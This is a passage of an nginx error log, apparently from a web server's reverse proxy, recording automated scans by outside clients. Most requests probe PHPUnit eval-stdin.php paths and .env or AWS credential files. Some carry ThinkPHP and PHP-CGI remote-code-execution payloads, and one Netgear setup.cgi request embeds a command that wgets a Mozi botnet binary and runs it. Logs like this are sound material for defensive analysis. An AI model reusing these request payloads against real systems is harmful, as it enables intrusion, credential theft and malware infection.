such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:45 [error] 906#906: *44111 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:46 [error] 906#906: *44111 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 12:01:33 [error] 923#923: *47148 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 13:14:23 [error] 924#924: *48610 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 14:18:41 [error] 917#917: *53499 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 27.43.206.93, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" +2026/02/17 14:48:31 [error] 917#917: *55821 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 16:06:09 [error] 920#920: *63758 open() "/var/www/html/version" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 16:06:09 [error] 920#920: *63762 open() "/var/www/html/v1" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /v1 HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 16:10:05 [error] 917#917: *65711 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:00:50 [error] 920#920: *71526 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:00:55 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:00:57 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:00:58 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:00 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:02 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:03 [error] 920#920: *71526 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:05 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:06 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:07 [error] 920#920: *71526 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:08 [error] 920#920: *71526 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:09 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:12 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:14 [error] 920#920: *71526 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:15 [error] 920#920: *71526 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:16 [error] 920#920: *71526 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:17 [error] 920#920: *71526 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:18 [error] 920#920: *71526 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:19 [error] 920#920: *71526 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:22 [error] 920#920: *71526 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:23 [error] 920#920: *71526 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:24 [error] 920#920: *71526 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:26 [error] 920#920: *71526 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:27 [error] 920#920: *71526 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:30 [error] 920#920: *71526 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:32 [error] 920#920: *71526 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:34 [error] 920#920: *71526 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:36 [error] 920#920: *71526 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:38 [error] 920#920: *71526 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:41 [error] 920#920: *71526 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:44 [error] 920#920: *71526 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:47 [error] 920#920: *71526 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:49 [error] 920#920: *71526 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:51 [error] 920#920: *71526 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:53 [error] 920#920: *71526 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:54 [error] 920#920: *71526 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 17:01:59 [error] 920#920: *71526 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 22:33:02 [error] 928#928: *92796 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 52.186.171.52, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" +2026/02/18 03:04:21 [error] 939#939: *93612 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:50:31 [error] 940#940: *93741 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:50:31 [error] 940#940: *93743 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:41 